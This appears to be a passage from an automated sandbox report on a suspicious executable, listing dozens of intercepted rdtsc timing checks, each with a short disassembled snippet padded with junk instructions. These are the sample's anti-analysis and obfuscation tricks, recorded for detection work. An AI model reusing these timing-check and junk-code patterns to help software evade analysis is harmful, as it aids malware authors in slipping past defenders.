Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED47 second address: B9ED6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d mov edi, dword ptr [ebp+122D21F2h] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 pushad 0x00000017 jnp 00007F35AD0C7238h 0x0000001d pushad 0x0000001e popad 0x0000001f jng 00007F35AD0C723Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B862 second address: B9B866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B866 second address: B9B86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B86C second address: B9B891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B564h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jnl 00007F35AD45B556h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DDC8 second address: B9DDCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EEC5 second address: B9EECB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EECB second address: B9EEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C7247h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EEE6 second address: B9EFA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007F35AD45B569h 0x00000011 call 00007F35AD45B55Eh 0x00000016 adc ebx, 61D795F1h 0x0000001c pop edi 0x0000001d pop ebx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 pushad 0x00000026 clc 0x00000027 jnc 00007F35AD45B55Ch 0x0000002d popad 0x0000002e mov bh, 6Fh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 add ebx, dword ptr [ebp+122D3548h] 0x0000003d mov eax, dword ptr [ebp+122D0829h] 0x00000043 jmp 00007F35AD45B561h 0x00000048 push FFFFFFFFh 0x0000004a jp 00007F35AD45B560h 0x00000050 jmp 00007F35AD45B55Ah 0x00000055 nop 0x00000056 jo 00007F35AD45B56Ch 0x0000005c jmp 00007F35AD45B566h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F35AD45B55Fh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DEAE second address: B9DEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DEB2 second address: B9DEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F35AD45B556h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DEBC second address: B9DECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DECC second address: B9DED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2F8E second address: BA2F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2F92 second address: BA2F9C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F35AD45B556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99147 second address: B99167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F35AD45B562h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99167 second address: B99179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C723Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99179 second address: B991EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD45B556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F35AD45B564h 0x00000012 mov ecx, edi 0x00000014 pop edx 0x00000015 mov ebx, dword ptr [ebp+1248F2BAh] 0x0000001b push eax 0x0000001c jnl 00007F35AD45B557h 0x00000022 pop edx 0x00000023 and edi, dword ptr [ebp+122D3554h] 0x00000029 add eax, ebx 0x0000002b jmp 00007F35AD45B561h 0x00000030 nop 0x00000031 push esi 0x00000032 jmp 00007F35AD45B566h 0x00000037 pop esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F35AD45B55Eh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9810 second address: BE9818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE99BB second address: BE99C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE99C0 second address: BE99F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F35AD0C7236h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnl 00007F35AD0C7242h 0x00000014 pushad 0x00000015 jmp 00007F35AD0C7241h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE99F4 second address: BE9A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F35AD45B556h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA442 second address: BEA44B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA44B second address: BEA456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA456 second address: BEA45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF00E7 second address: BF00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF0255 second address: BF0265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF068A second address: BF06AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B565h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F35AD45B55Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF06AF second address: BF06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF1981 second address: BF1987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF1987 second address: BF1993 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F35AD0C7236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF678E second address: BF67A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD45B55Dh 0x00000009 jnc 00007F35AD45B556h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF57C0 second address: BF57C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF596D second address: BF599E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B565h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jbe 00007F35AD45B556h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F35AD45B558h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF599E second address: BF59AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF59AA second address: BF59B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B07 second address: BF5B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B24 second address: BF5B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F35AD45B556h 0x0000000f jc 00007F35AD45B556h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B3B second address: BF5B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B40 second address: BF5B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F35AD45B568h 0x00000008 jne 00007F35AD45B556h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CA7 second address: BF5CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CAD second address: BF5CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CB1 second address: BF5CD2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F35AD0C724Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CD2 second address: BF5CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E42 second address: BF5E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F35AD0C7236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E4E second address: BF5E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E52 second address: BF5E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E56 second address: BF5E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F35AD45B556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E6A second address: BF5E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E74 second address: BF5E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E80 second address: BF5E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7242h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E96 second address: BF5EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B561h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5EAB second address: BF5EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5EB1 second address: BF5EDD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F35AD45B55Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F35AD45B568h 0x0000000f jc 00007F35AD45B556h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5EDD second address: BF5EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6049 second address: BF6050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC21 second address: BFAC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC25 second address: BFAC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC2D second address: BFAC4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD0C7238h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F35AD0C7242h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC4D second address: BFAC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E37 second address: C02E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7249h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E58 second address: C02E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E68 second address: C02E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E6C second address: C02E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007F35AD45B556h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E7A second address: C02E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01019 second address: C01024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F35AD45B556h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01301 second address: C01305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01305 second address: C01309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01309 second address: C01311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0145E second address: C0147C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B566h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015B5 second address: C015B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015B9 second address: C015BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015BD second address: C015C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015C3 second address: C015DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F35AD45B565h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C015DE second address: C0160B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jc 00007F35AD0C7236h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F35AD0C7247h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0160B second address: C0161D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0161D second address: C01623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01A05 second address: C01A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01A09 second address: C01A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F35AD0C723Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01B6E second address: C01B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F35AD45B556h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01B7A second address: C01BBF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F35AD0C7236h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pushad 0x0000001a jne 00007F35AD0C7236h 0x00000020 jmp 00007F35AD0C7248h 0x00000025 push esi 0x00000026 pop esi 0x00000027 je 00007F35AD0C7236h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01BBF second address: C01BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D75 second address: C01D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D7E second address: C01D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D82 second address: C01D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7247h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02C9F second address: C02CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F35AD45B568h 0x0000000f jmp 00007F35AD45B563h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02CD4 second address: C02CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02CD8 second address: C02CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02CE0 second address: C02D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C723Ah 0x00000007 push edx 0x00000008 jnp 00007F35AD0C7236h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007F35AD0C723Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02D08 second address: C02D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0947C second address: C09480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09480 second address: C0948C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F35AD45B556h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0948C second address: C09496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08E2F second address: C08E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F35AD45B558h 0x0000000b pushad 0x0000000c jc 00007F35AD45B556h 0x00000012 jmp 00007F35AD45B566h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08E5B second address: C08E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F35AD0C7236h 0x0000000a popad 0x0000000b popad 0x0000000c jng 00007F35AD0C7242h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C090D2 second address: C090D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C090D8 second address: C090EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F35AD0C7236h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F35AD0C7236h 0x00000013 rdtsc
